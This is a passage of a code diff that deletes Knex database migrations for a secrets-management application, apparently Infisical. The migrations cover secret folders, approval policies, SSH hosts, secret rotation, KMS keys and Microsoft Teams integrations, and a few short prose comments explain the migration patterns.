if (hasReminderNoteCol) {
await knex.schema.alterTable(tableName, (t) => {
t.string("reminderNote").alter();
});
}
}
}

View File

@@ -1,23 +0,0 @@
import { Knex } from "knex";
import { TableName } from "@app/db/schemas";
export async function up(knex: Knex): Promise<void> {
const hasProjectDescription = await knex.schema.hasColumn(TableName.SecretFolder, "description");
if (!hasProjectDescription) {
await knex.schema.alterTable(TableName.SecretFolder, (t) => {
t.string("description");
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasProjectDescription = await knex.schema.hasColumn(TableName.SecretFolder, "description");
if (hasProjectDescription) {
await knex.schema.alterTable(TableName.SecretFolder, (t) => {
t.dropColumn("description");
});
}
}

View File

@@ -1,19 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.SecretApprovalRequestReviewer, "comment"))) {
await knex.schema.alterTable(TableName.SecretApprovalRequestReviewer, (t) => {
t.string("comment");
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.SecretApprovalRequestReviewer, "comment")) {
await knex.schema.alterTable(TableName.SecretApprovalRequestReviewer, (t) => {
t.dropColumn("comment");
});
}
}

View File

@@ -1,45 +0,0 @@
import { Knex } from "knex";
import { TableName } from "@app/db/schemas";
export async function up(knex: Knex): Promise<void> {
if (await knex.schema.hasTable(TableName.SecretVersionV2)) {
const hasSecretVersionV2UserActorId = await knex.schema.hasColumn(TableName.SecretVersionV2, "userActorId");
const hasSecretVersionV2IdentityActorId = await knex.schema.hasColumn(TableName.SecretVersionV2, "identityActorId");
const hasSecretVersionV2ActorType = await knex.schema.hasColumn(TableName.SecretVersionV2, "actorType");
await knex.schema.alterTable(TableName.SecretVersionV2, (t) => {
if (!hasSecretVersionV2UserActorId) {
t.uuid("userActorId");
t.foreign("userActorId").references("id").inTable(TableName.Users);
}
if (!hasSecretVersionV2IdentityActorId) {
t.uuid("identityActorId");
t.foreign("identityActorId").references("id").inTable(TableName.Identity);
}
if (!hasSecretVersionV2ActorType) {
t.string("actorType");
}
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasTable(TableName.SecretVersionV2)) {
const hasSecretVersionV2UserActorId = await knex.schema.hasColumn(TableName.SecretVersionV2, "userActorId");
const hasSecretVersionV2IdentityActorId = await knex.schema.hasColumn(TableName.SecretVersionV2, "identityActorId");
const hasSecretVersionV2ActorType = await knex.schema.hasColumn(TableName.SecretVersionV2, "actorType");
await knex.schema.alterTable(TableName.SecretVersionV2, (t) => {
if (hasSecretVersionV2UserActorId) {
t.dropColumn("userActorId");
}
if (hasSecretVersionV2IdentityActorId) {
t.dropColumn("identityActorId");
}
if (hasSecretVersionV2ActorType) {
t.dropColumn("actorType");
}
});
}
}

View File

@@ -1,32 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (await knex.schema.hasTable(TableName.Organization)) {
const hasSecretShareToAnyoneCol = await knex.schema.hasColumn(
TableName.Organization,
"allowSecretSharingOutsideOrganization"
);
if (!hasSecretShareToAnyoneCol) {
await knex.schema.alterTable(TableName.Organization, (t) => {
t.boolean("allowSecretSharingOutsideOrganization").defaultTo(true);
});
}
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasTable(TableName.Organization)) {
const hasSecretShareToAnyoneCol = await knex.schema.hasColumn(
TableName.Organization,
"allowSecretSharingOutsideOrganization"
);
if (hasSecretShareToAnyoneCol) {
await knex.schema.alterTable(TableName.Organization, (t) => {
t.dropColumn("allowSecretSharingOutsideOrganization");
});
}
}
}

View File

@@ -1,31 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.Organization, "shouldUseNewPrivilegeSystem"))) {
await knex.schema.alterTable(TableName.Organization, (t) => {
t.boolean("shouldUseNewPrivilegeSystem");
t.string("privilegeUpgradeInitiatedByUsername");
t.dateTime("privilegeUpgradeInitiatedAt");
});
await knex(TableName.Organization).update({
shouldUseNewPrivilegeSystem: false
});
await knex.schema.alterTable(TableName.Organization, (t) => {
t.boolean("shouldUseNewPrivilegeSystem").defaultTo(true).notNullable().alter();
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.Organization, "shouldUseNewPrivilegeSystem")) {
await knex.schema.alterTable(TableName.Organization, (t) => {
t.dropColumn("shouldUseNewPrivilegeSystem");
t.dropColumn("privilegeUpgradeInitiatedByUsername");
t.dropColumn("privilegeUpgradeInitiatedAt");
});
}
}

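The shouldUseNewPrivilegeSystem migration above follows a common three-step pattern: add the column as nullable, backfill existing rows with the legacy value, then alter it to be required with a different default for new rows. A generic sketch of the same steps, with a hypothetical column name, for comparison:

import { Knex } from "knex";

// Hypothetical table/column names; the steps mirror the migration above.
export async function up(knex: Knex): Promise<void> {
  if (!(await knex.schema.hasColumn("organizations", "useNewBehavior"))) {
    // 1. Add the column without constraints so existing rows are untouched.
    await knex.schema.alterTable("organizations", (t) => {
      t.boolean("useNewBehavior");
    });
    // 2. Backfill: existing rows keep the legacy behavior.
    await knex("organizations").update({ useNewBehavior: false });
    // 3. New rows opt into the new behavior by default, and the column becomes required.
    await knex.schema.alterTable("organizations", (t) => {
      t.boolean("useNewBehavior").defaultTo(true).notNullable().alter();
    });
  }
}

export async function down(knex: Knex): Promise<void> {
  if (await knex.schema.hasColumn("organizations", "useNewBehavior")) {
    await knex.schema.alterTable("organizations", (t) => {
      t.dropColumn("useNewBehavior");
    });
  }
}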
View File

@@ -1,21 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasMappingField = await knex.schema.hasColumn(TableName.IdentityOidcAuth, "claimMetadataMapping");
if (!hasMappingField) {
await knex.schema.alterTable(TableName.IdentityOidcAuth, (t) => {
t.jsonb("claimMetadataMapping");
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasMappingField = await knex.schema.hasColumn(TableName.IdentityOidcAuth, "claimMetadataMapping");
if (hasMappingField) {
await knex.schema.alterTable(TableName.IdentityOidcAuth, (t) => {
t.dropColumn("claimMetadataMapping");
});
}
}

View File

@@ -1,19 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas/models";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.SuperAdmin, "adminIdentityIds"))) {
await knex.schema.alterTable(TableName.SuperAdmin, (t) => {
t.specificType("adminIdentityIds", "text[]");
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.SuperAdmin, "adminIdentityIds")) {
await knex.schema.alterTable(TableName.SuperAdmin, (t) => {
t.dropColumn("adminIdentityIds");
});
}
}

View File

@@ -1,23 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const doesParentColumExist = await knex.schema.hasColumn(TableName.SecretFolder, "parentId");
const doesNameColumnExist = await knex.schema.hasColumn(TableName.SecretFolder, "name");
if (doesParentColumExist && doesNameColumnExist) {
await knex.schema.alterTable(TableName.SecretFolder, (t) => {
t.index(["parentId", "name"]);
});
}
}
export async function down(knex: Knex): Promise<void> {
const doesParentColumExist = await knex.schema.hasColumn(TableName.SecretFolder, "parentId");
const doesNameColumnExist = await knex.schema.hasColumn(TableName.SecretFolder, "name");
if (doesParentColumExist && doesNameColumnExist) {
await knex.schema.alterTable(TableName.SecretFolder, (t) => {
t.dropIndex(["parentId", "name"]);
});
}
}

View File

@@ -1,19 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasReviewerJwtCol = await knex.schema.hasColumn(
TableName.IdentityKubernetesAuth,
"encryptedKubernetesTokenReviewerJwt"
);
if (hasReviewerJwtCol) {
await knex.schema.alterTable(TableName.IdentityKubernetesAuth, (t) => {
t.binary("encryptedKubernetesTokenReviewerJwt").nullable().alter();
});
}
}
export async function down(): Promise<void> {
// we can't revert it to non-nullable; the alter would fail
}

View File

@@ -1,29 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas/models";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.SecretApprovalPolicy, "allowedSelfApprovals"))) {
await knex.schema.alterTable(TableName.SecretApprovalPolicy, (t) => {
t.boolean("allowedSelfApprovals").notNullable().defaultTo(true);
});
}
if (!(await knex.schema.hasColumn(TableName.AccessApprovalPolicy, "allowedSelfApprovals"))) {
await knex.schema.alterTable(TableName.AccessApprovalPolicy, (t) => {
t.boolean("allowedSelfApprovals").notNullable().defaultTo(true);
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.SecretApprovalPolicy, "allowedSelfApprovals")) {
await knex.schema.alterTable(TableName.SecretApprovalPolicy, (t) => {
t.dropColumn("allowedSelfApprovals");
});
}
if (await knex.schema.hasColumn(TableName.AccessApprovalPolicy, "allowedSelfApprovals")) {
await knex.schema.alterTable(TableName.AccessApprovalPolicy, (t) => {
t.dropColumn("allowedSelfApprovals");
});
}
}

View File

@@ -1,19 +0,0 @@
import { Knex } from "knex";
import { TableName } from "@app/db/schemas";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.AppConnection, "isPlatformManagedCredentials"))) {
await knex.schema.alterTable(TableName.AppConnection, (t) => {
t.boolean("isPlatformManagedCredentials").defaultTo(false);
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.AppConnection, "isPlatformManagedCredentials")) {
await knex.schema.alterTable(TableName.AppConnection, (t) => {
t.dropColumn("isPlatformManagedCredentials");
});
}
}

View File

@@ -1,58 +0,0 @@
import { Knex } from "knex";
import { TableName } from "@app/db/schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "@app/db/utils";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasTable(TableName.SecretRotationV2))) {
await knex.schema.createTable(TableName.SecretRotationV2, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.string("name", 32).notNullable();
t.string("description");
t.string("type").notNullable();
t.jsonb("parameters").notNullable();
t.jsonb("secretsMapping").notNullable();
t.binary("encryptedGeneratedCredentials").notNullable();
t.boolean("isAutoRotationEnabled").notNullable().defaultTo(true);
t.integer("activeIndex").notNullable().defaultTo(0);
t.uuid("folderId").notNullable();
t.foreign("folderId").references("id").inTable(TableName.SecretFolder).onDelete("CASCADE");
t.uuid("connectionId").notNullable();
t.foreign("connectionId").references("id").inTable(TableName.AppConnection);
t.timestamps(true, true, true);
t.integer("rotationInterval").notNullable();
t.jsonb("rotateAtUtc").notNullable(); // { hours: number; minutes: number }
t.string("rotationStatus").notNullable();
t.datetime("lastRotationAttemptedAt").notNullable();
t.datetime("lastRotatedAt").notNullable();
t.binary("encryptedLastRotationMessage"); // we encrypt this because it may contain sensitive info (SQL errors showing credentials)
t.string("lastRotationJobId");
t.datetime("nextRotationAt");
t.boolean("isLastRotationManual").notNullable().defaultTo(true); // creation is considered a "manual" rotation
});
await createOnUpdateTrigger(knex, TableName.SecretRotationV2);
await knex.schema.alterTable(TableName.SecretRotationV2, (t) => {
t.unique(["folderId", "name"]);
});
}
if (!(await knex.schema.hasTable(TableName.SecretRotationV2SecretMapping))) {
await knex.schema.createTable(TableName.SecretRotationV2SecretMapping, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.uuid("secretId").notNullable();
// scott: this is deferred to block secret deletion but not prevent folder/environment/project deletion
// ie, if rotation is being deleted as well we permit it, otherwise throw
t.foreign("secretId").references("id").inTable(TableName.SecretV2).deferrable("deferred");
t.uuid("rotationId").notNullable();
t.foreign("rotationId").references("id").inTable(TableName.SecretRotationV2).onDelete("CASCADE");
});
}
}
export async function down(knex: Knex): Promise<void> {
await knex.schema.dropTableIfExists(TableName.SecretRotationV2SecretMapping);
await knex.schema.dropTableIfExists(TableName.SecretRotationV2);
await dropOnUpdateTrigger(knex, TableName.SecretRotationV2);
}

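The secretId foreign key in the mapping table above is declared deferrable("deferred"), which matches the inline comment: a secret that still backs a rotation cannot be deleted on its own, but a transaction that also removes the rotation (or its folder/project via cascade) is allowed. A sketch of how a deferred constraint behaves, with illustrative table names:

import { Knex } from "knex";

// Illustrative only: with an INITIALLY DEFERRED constraint, FK checks run at COMMIT,
// so related rows can be deleted in any order inside one transaction.
export const deleteSecretWithRotationMapping = async (knex: Knex, secretId: string): Promise<void> => {
  await knex.transaction(async (trx) => {
    // Deleting the secret first would normally violate the mapping's FK immediately;
    // with a deferred constraint the check waits until the transaction commits.
    await trx("secrets_v2").where({ id: secretId }).delete();
    await trx("secret_rotation_v2_secret_mappings").where({ secretId }).delete();
    // At COMMIT the constraint is satisfied because both rows are gone.
  });
};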
View File

@@ -1,21 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasCol = await knex.schema.hasColumn(TableName.SecretFolder, "lastSecretModified");
if (!hasCol) {
await knex.schema.alterTable(TableName.SecretFolder, (t) => {
t.datetime("lastSecretModified");
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasCol = await knex.schema.hasColumn(TableName.SecretFolder, "lastSecretModified");
if (hasCol) {
await knex.schema.alterTable(TableName.SecretFolder, (t) => {
t.dropColumn("lastSecretModified");
});
}
}

View File

@@ -1,25 +0,0 @@
import { Knex } from "knex";
import { KmsKeyUsage } from "@app/services/kms/kms-types";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasKeyUsageColumn = await knex.schema.hasColumn(TableName.KmsKey, "keyUsage");
if (!hasKeyUsageColumn) {
await knex.schema.alterTable(TableName.KmsKey, (t) => {
t.string("keyUsage").notNullable().defaultTo(KmsKeyUsage.ENCRYPT_DECRYPT);
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasKeyUsageColumn = await knex.schema.hasColumn(TableName.KmsKey, "keyUsage");
if (hasKeyUsageColumn) {
await knex.schema.alterTable(TableName.KmsKey, (t) => {
t.dropColumn("keyUsage");
});
}
}

View File

@@ -1,32 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.SshCertificateAuthority, "keySource"))) {
await knex.schema.alterTable(TableName.SshCertificateAuthority, (t) => {
t.string("keySource");
});
// Backfilling the keySource to internal
await knex(TableName.SshCertificateAuthority).update({ keySource: "internal" });
await knex.schema.alterTable(TableName.SshCertificateAuthority, (t) => {
t.string("keySource").notNullable().alter();
});
}
if (await knex.schema.hasColumn(TableName.SshCertificate, "sshCaId")) {
await knex.schema.alterTable(TableName.SshCertificate, (t) => {
t.uuid("sshCaId").nullable().alter();
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.SshCertificateAuthority, "keySource")) {
await knex.schema.alterTable(TableName.SshCertificateAuthority, (t) => {
t.dropColumn("keySource");
});
}
}

View File

@@ -1,93 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasTable(TableName.SshHost))) {
await knex.schema.createTable(TableName.SshHost, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.timestamps(true, true, true);
t.string("projectId").notNullable();
t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
t.string("hostname").notNullable();
t.string("userCertTtl").notNullable();
t.string("hostCertTtl").notNullable();
t.uuid("userSshCaId").notNullable();
t.foreign("userSshCaId").references("id").inTable(TableName.SshCertificateAuthority).onDelete("CASCADE");
t.uuid("hostSshCaId").notNullable();
t.foreign("hostSshCaId").references("id").inTable(TableName.SshCertificateAuthority).onDelete("CASCADE");
t.unique(["projectId", "hostname"]);
});
await createOnUpdateTrigger(knex, TableName.SshHost);
}
if (!(await knex.schema.hasTable(TableName.SshHostLoginUser))) {
await knex.schema.createTable(TableName.SshHostLoginUser, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.timestamps(true, true, true);
t.uuid("sshHostId").notNullable();
t.foreign("sshHostId").references("id").inTable(TableName.SshHost).onDelete("CASCADE");
t.string("loginUser").notNullable(); // e.g. ubuntu, root, ec2-user, ...
t.unique(["sshHostId", "loginUser"]);
});
await createOnUpdateTrigger(knex, TableName.SshHostLoginUser);
}
if (!(await knex.schema.hasTable(TableName.SshHostLoginUserMapping))) {
await knex.schema.createTable(TableName.SshHostLoginUserMapping, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.timestamps(true, true, true);
t.uuid("sshHostLoginUserId").notNullable();
t.foreign("sshHostLoginUserId").references("id").inTable(TableName.SshHostLoginUser).onDelete("CASCADE");
t.uuid("userId").nullable();
t.foreign("userId").references("id").inTable(TableName.Users).onDelete("CASCADE");
t.unique(["sshHostLoginUserId", "userId"]);
});
await createOnUpdateTrigger(knex, TableName.SshHostLoginUserMapping);
}
if (!(await knex.schema.hasTable(TableName.ProjectSshConfig))) {
// new table to store configuration for projects of type SSH (i.e. Infisical SSH)
await knex.schema.createTable(TableName.ProjectSshConfig, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.timestamps(true, true, true);
t.string("projectId").notNullable();
t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
t.uuid("defaultUserSshCaId");
t.foreign("defaultUserSshCaId").references("id").inTable(TableName.SshCertificateAuthority).onDelete("CASCADE");
t.uuid("defaultHostSshCaId");
t.foreign("defaultHostSshCaId").references("id").inTable(TableName.SshCertificateAuthority).onDelete("CASCADE");
});
await createOnUpdateTrigger(knex, TableName.ProjectSshConfig);
}
const hasColumn = await knex.schema.hasColumn(TableName.SshCertificate, "sshHostId");
if (!hasColumn) {
await knex.schema.alterTable(TableName.SshCertificate, (t) => {
t.uuid("sshHostId").nullable();
t.foreign("sshHostId").references("id").inTable(TableName.SshHost).onDelete("SET NULL");
});
}
}
export async function down(knex: Knex): Promise<void> {
await knex.schema.dropTableIfExists(TableName.ProjectSshConfig);
await dropOnUpdateTrigger(knex, TableName.ProjectSshConfig);
await knex.schema.dropTableIfExists(TableName.SshHostLoginUserMapping);
await dropOnUpdateTrigger(knex, TableName.SshHostLoginUserMapping);
await knex.schema.dropTableIfExists(TableName.SshHostLoginUser);
await dropOnUpdateTrigger(knex, TableName.SshHostLoginUser);
const hasColumn = await knex.schema.hasColumn(TableName.SshCertificate, "sshHostId");
if (hasColumn) {
await knex.schema.alterTable(TableName.SshCertificate, (t) => {
t.dropColumn("sshHostId");
});
}
await knex.schema.dropTableIfExists(TableName.SshHost);
await dropOnUpdateTrigger(knex, TableName.SshHost);
}

View File

@@ -1,20 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.ResourceMetadata, "dynamicSecretId"))) {
await knex.schema.alterTable(TableName.ResourceMetadata, (tb) => {
tb.uuid("dynamicSecretId");
tb.foreign("dynamicSecretId").references("id").inTable(TableName.DynamicSecret).onDelete("CASCADE");
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.ResourceMetadata, "dynamicSecretId")) {
await knex.schema.alterTable(TableName.ResourceMetadata, (tb) => {
tb.dropColumn("dynamicSecretId");
});
}
}

View File

@@ -1,21 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasCol = await knex.schema.hasColumn(TableName.AccessApprovalRequest, "note");
if (!hasCol) {
await knex.schema.alterTable(TableName.AccessApprovalRequest, (t) => {
t.string("note").nullable();
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasCol = await knex.schema.hasColumn(TableName.AccessApprovalRequest, "note");
if (hasCol) {
await knex.schema.alterTable(TableName.AccessApprovalRequest, (t) => {
t.dropColumn("note");
});
}
}

View File

@@ -1,27 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasCol = await knex.schema.hasColumn(TableName.ServiceToken, "expiryNotificationSent");
if (!hasCol) {
await knex.schema.alterTable(TableName.ServiceToken, (t) => {
t.boolean("expiryNotificationSent").defaultTo(false);
});
// Update only tokens where expiresAt is before current time
await knex(TableName.ServiceToken)
.whereRaw(`${TableName.ServiceToken}."expiresAt" < NOW()`)
.whereNotNull("expiresAt")
.update({ expiryNotificationSent: true });
}
}
export async function down(knex: Knex): Promise<void> {
const hasCol = await knex.schema.hasColumn(TableName.ServiceToken, "expiryNotificationSent");
if (hasCol) {
await knex.schema.alterTable(TableName.ServiceToken, (t) => {
t.dropColumn("expiryNotificationSent");
});
}
}

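The backfill above flags tokens that are already expired as notified, so the new expiry notifier doesn't fire retroactively for them on deploy. A small sketch of the same guarded update; the table and column names are taken from the hunk but treated here as assumptions:

import { Knex } from "knex";

// Assumed names; quoting "expiresAt" in raw SQL is required because the column is camelCase.
export const markAlreadyExpiredAsNotified = async (knex: Knex): Promise<number> =>
  knex("service_tokens")
    .whereRaw(`"expiresAt" < NOW()`) // only tokens whose expiry is already in the past
    .whereNotNull("expiresAt") // skip non-expiring tokens
    .update({ expiryNotificationSent: true });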
View File

@@ -1,21 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasCol = await knex.schema.hasColumn(TableName.Project, "hasDeleteProtection");
if (!hasCol) {
await knex.schema.alterTable(TableName.Project, (t) => {
t.boolean("hasDeleteProtection").defaultTo(false);
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasCol = await knex.schema.hasColumn(TableName.Project, "hasDeleteProtection");
if (hasCol) {
await knex.schema.alterTable(TableName.Project, (t) => {
t.dropColumn("hasDeleteProtection");
});
}
}

View File

@@ -1,15 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
await knex.schema.alterTable(TableName.Certificate, (t) => {
t.string("altNames", 4096).alter();
});
}
export async function down(knex: Knex): Promise<void> {
await knex.schema.alterTable(TableName.Certificate, (t) => {
t.string("altNames").alter(); // Defaults to varchar(255)
});
}

View File

@@ -1,15 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
await knex.schema.alterTable(TableName.KmipOrgServerCertificates, (t) => {
t.string("altNames", 4096).alter();
});
}
export async function down(knex: Knex): Promise<void> {
await knex.schema.alterTable(TableName.KmipOrgServerCertificates, (t) => {
t.string("altNames").alter(); // Defaults to varchar(255)
});
}

View File

@@ -1,21 +0,0 @@
import { Knex } from "knex";
import { OIDCJWTSignatureAlgorithm } from "@app/ee/services/oidc/oidc-config-types";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.OidcConfig, "jwtSignatureAlgorithm"))) {
await knex.schema.alterTable(TableName.OidcConfig, (t) => {
t.string("jwtSignatureAlgorithm").defaultTo(OIDCJWTSignatureAlgorithm.RS256).notNullable();
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.OidcConfig, "jwtSignatureAlgorithm")) {
await knex.schema.alterTable(TableName.OidcConfig, (t) => {
t.dropColumn("jwtSignatureAlgorithm");
});
}
}

View File

@@ -1,19 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.Organization, "bypassOrgAuthEnabled"))) {
await knex.schema.alterTable(TableName.Organization, (t) => {
t.boolean("bypassOrgAuthEnabled").defaultTo(false).notNullable();
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.Organization, "bypassOrgAuthEnabled")) {
await knex.schema.alterTable(TableName.Organization, (t) => {
t.dropColumn("bypassOrgAuthEnabled");
});
}
}

View File

@@ -1,34 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasSecretReminderRecipientsTable = await knex.schema.hasTable(TableName.SecretReminderRecipients);
if (!hasSecretReminderRecipientsTable) {
await knex.schema.createTable(TableName.SecretReminderRecipients, (table) => {
table.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
table.timestamps(true, true, true);
table.uuid("secretId").notNullable();
table.uuid("userId").notNullable();
table.string("projectId").notNullable();
// Based on userId rather than project membership ID so we can easily extend group support in the future if need be.
// This does however mean we need to manually clean up once a user is removed from a project.
table.foreign("userId").references("id").inTable(TableName.Users).onDelete("CASCADE");
table.foreign("secretId").references("id").inTable(TableName.SecretV2).onDelete("CASCADE");
table.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
table.index("secretId");
table.unique(["secretId", "userId"]);
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasSecretReminderRecipientsTable = await knex.schema.hasTable(TableName.SecretReminderRecipients);
if (hasSecretReminderRecipientsTable) {
await knex.schema.dropTableIfExists(TableName.SecretReminderRecipients);
}
}

View File

@@ -1,29 +0,0 @@
import { Knex } from "knex";
import { TableName } from "@app/db/schemas";
export async function up(knex: Knex): Promise<void> {
await knex.schema.alterTable(TableName.SecretVersionV2, (table) => {
table.dropForeign(["userActorId"]);
table.dropForeign(["identityActorId"]);
});
await knex.schema.alterTable(TableName.SecretVersionV2, (table) => {
table.foreign("userActorId").references("id").inTable(TableName.Users).onDelete("SET NULL");
table.foreign("identityActorId").references("id").inTable(TableName.Identity).onDelete("SET NULL");
});
}
export async function down(knex: Knex): Promise<void> {
await knex.schema.alterTable(TableName.SecretVersionV2, (table) => {
table.dropForeign(["userActorId"]);
table.dropForeign(["identityActorId"]);
});
await knex.schema.alterTable(TableName.SecretVersionV2, (table) => {
table.foreign("userActorId").references("id").inTable(TableName.Users);
table.foreign("identityActorId").references("id").inTable(TableName.Identity);
});
}

View File

@@ -1,130 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
export async function up(knex: Knex): Promise<void> {
const superAdminHasEncryptedMicrosoftTeamsClientIdColumn = await knex.schema.hasColumn(
TableName.SuperAdmin,
"encryptedMicrosoftTeamsAppId"
);
const superAdminHasEncryptedMicrosoftTeamsClientSecret = await knex.schema.hasColumn(
TableName.SuperAdmin,
"encryptedMicrosoftTeamsClientSecret"
);
const superAdminHasEncryptedMicrosoftTeamsBotId = await knex.schema.hasColumn(
TableName.SuperAdmin,
"encryptedMicrosoftTeamsBotId"
);
if (
!superAdminHasEncryptedMicrosoftTeamsClientIdColumn ||
!superAdminHasEncryptedMicrosoftTeamsClientSecret ||
!superAdminHasEncryptedMicrosoftTeamsBotId
) {
await knex.schema.alterTable(TableName.SuperAdmin, (table) => {
if (!superAdminHasEncryptedMicrosoftTeamsClientIdColumn) {
table.binary("encryptedMicrosoftTeamsAppId").nullable();
}
if (!superAdminHasEncryptedMicrosoftTeamsClientSecret) {
table.binary("encryptedMicrosoftTeamsClientSecret").nullable();
}
if (!superAdminHasEncryptedMicrosoftTeamsBotId) {
table.binary("encryptedMicrosoftTeamsBotId").nullable();
}
});
}
if (!(await knex.schema.hasColumn(TableName.WorkflowIntegrations, "status"))) {
await knex.schema.alterTable(TableName.WorkflowIntegrations, (table) => {
table.enu("status", ["pending", "installed", "failed"]).notNullable().defaultTo("installed"); // defaults to installed so we can have backwards compatibility with existing workflow integrations
});
}
if (!(await knex.schema.hasTable(TableName.MicrosoftTeamsIntegrations))) {
await knex.schema.createTable(TableName.MicrosoftTeamsIntegrations, (table) => {
table.uuid("id", { primaryKey: true }).notNullable();
table.foreign("id").references("id").inTable(TableName.WorkflowIntegrations).onDelete("CASCADE"); // the ID itself is the workflow integration ID
table.string("internalTeamsAppId").nullable();
table.string("tenantId").notNullable();
table.binary("encryptedAccessToken").nullable();
table.binary("encryptedBotAccessToken").nullable();
table.timestamp("accessTokenExpiresAt").nullable();
table.timestamp("botAccessTokenExpiresAt").nullable();
table.timestamps(true, true, true);
});
await createOnUpdateTrigger(knex, TableName.MicrosoftTeamsIntegrations);
}
if (!(await knex.schema.hasTable(TableName.ProjectMicrosoftTeamsConfigs))) {
await knex.schema.createTable(TableName.ProjectMicrosoftTeamsConfigs, (tb) => {
tb.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
tb.string("projectId").notNullable().unique();
tb.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
tb.uuid("microsoftTeamsIntegrationId").notNullable();
tb.foreign("microsoftTeamsIntegrationId")
.references("id")
.inTable(TableName.MicrosoftTeamsIntegrations)
.onDelete("CASCADE");
tb.boolean("isAccessRequestNotificationEnabled").notNullable().defaultTo(false);
tb.boolean("isSecretRequestNotificationEnabled").notNullable().defaultTo(false);
tb.jsonb("accessRequestChannels").notNullable(); // {teamId: string, channelIds: string[]}
tb.jsonb("secretRequestChannels").notNullable(); // {teamId: string, channelIds: string[]}
tb.timestamps(true, true, true);
});
await createOnUpdateTrigger(knex, TableName.ProjectMicrosoftTeamsConfigs);
}
}
export async function down(knex: Knex): Promise<void> {
const hasEncryptedMicrosoftTeamsClientIdColumn = await knex.schema.hasColumn(
TableName.SuperAdmin,
"encryptedMicrosoftTeamsAppId"
);
const hasEncryptedMicrosoftTeamsClientSecret = await knex.schema.hasColumn(
TableName.SuperAdmin,
"encryptedMicrosoftTeamsClientSecret"
);
const hasEncryptedMicrosoftTeamsBotId = await knex.schema.hasColumn(
TableName.SuperAdmin,
